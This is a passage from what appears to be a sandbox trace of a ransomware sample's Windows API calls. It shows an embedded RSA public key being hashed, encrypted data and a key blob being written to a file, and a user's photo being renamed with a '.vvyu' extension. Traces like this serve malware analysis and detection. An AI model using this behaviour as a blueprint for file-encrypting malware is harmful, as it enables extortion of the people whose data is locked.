KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0190.007] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.007] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.007] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0190.008] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0190.008] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.008] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0190.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0190.008] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0190.008] GetLastError () returned 0x0 [0190.009] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0190.009] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0190.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.009] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0190.009] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0190.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.009] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0190.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c50) returned 0x2ae5ea0 [0190.009] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0190.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0190.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0190.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0190.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbb0 [0190.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af2fa0 [0190.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbc8 [0190.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbf8 [0190.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc58 [0190.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc10 [0190.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0190.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0190.010] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0190.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0190.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbf8 | out: hHeap=0x2c0000) returned 1 [0190.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc10 | out: hHeap=0x2c0000) returned 1 [0190.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc58 | out: hHeap=0x2c0000) returned 1 [0190.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0190.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc58 [0190.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0190.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc10 [0190.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0190.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0dbf8 [0190.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0190.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0190.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0190.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0190.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0190.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0190.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0190.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc10 | out: hHeap=0x2c0000) returned 1 [0190.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbf8 | out: hHeap=0x2c0000) returned 1 [0190.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc58 | out: hHeap=0x2c0000) returned 1 [0190.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0190.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0190.013] GetCurrentThreadId () returned 0x5d8 [0190.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0190.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae4968 [0190.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0190.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0190.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0190.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0190.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.014] GetCurrentThreadId () returned 0x5d8 [0190.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0190.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0190.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0190.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0190.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc58 [0190.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0190.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0190.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0190.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbf8 [0190.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0190.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0190.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0190.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0190.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc10 [0190.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0190.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0190.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0190.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbe0 [0190.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0190.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc70 [0190.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0190.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc40 [0190.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc28 [0190.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc88 [0190.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc28 | out: hHeap=0x2c0000) returned 1 [0190.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc28 [0190.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc40 | out: hHeap=0x2c0000) returned 1 [0190.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0190.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0190.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0190.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbf8 | out: hHeap=0x2c0000) returned 1 [0190.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbf8 [0190.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0190.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc58 | out: hHeap=0x2c0000) returned 1 [0190.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0190.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc88 | out: hHeap=0x2c0000) returned 1 [0190.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0190.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0190.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0190.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbf8 | out: hHeap=0x2c0000) returned 1 [0190.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0190.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0190.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0190.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0190.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0190.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0190.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0190.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0190.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0190.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0190.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc28 | out: hHeap=0x2c0000) returned 1 [0190.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc70 | out: hHeap=0x2c0000) returned 1 [0190.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc10 | out: hHeap=0x2c0000) returned 1 [0190.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbe0 | out: hHeap=0x2c0000) returned 1 [0190.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0190.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0190.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0190.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbc8 | out: hHeap=0x2c0000) returned 1 [0190.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2fa0 | out: hHeap=0x2c0000) returned 1 [0190.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0190.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0190.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0190.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0190.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0190.024] WriteFile (in: hFile=0x584, lpBuffer=0x2ae5ea0*, nNumberOfBytesToWrite=0x2c4e, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae5ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0x2c4e, lpOverlapped=0x0) returned 1 [0190.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ea0 | out: hHeap=0x2c0000) returned 1 [0190.025] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x2c53, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.025] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0190.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0190.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0190.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0190.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.026] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0190.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0190.026] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.026] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0190.026] CloseHandle (hObject=0x584) returned 1 [0190.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0190.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.143] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\-ctDCbmthLRz.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\-ctdcbmthlrz.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\-ctDCbmthLRz.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\-ctdcbmthlrz.jpg.vvyu")) returned 1 [0190.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.145] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.148] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb39b4f80, ftCreationTime.dwHighDateTime=0x1d89f80, ftLastAccessTime.dwLowDateTime=0x2d1be120, 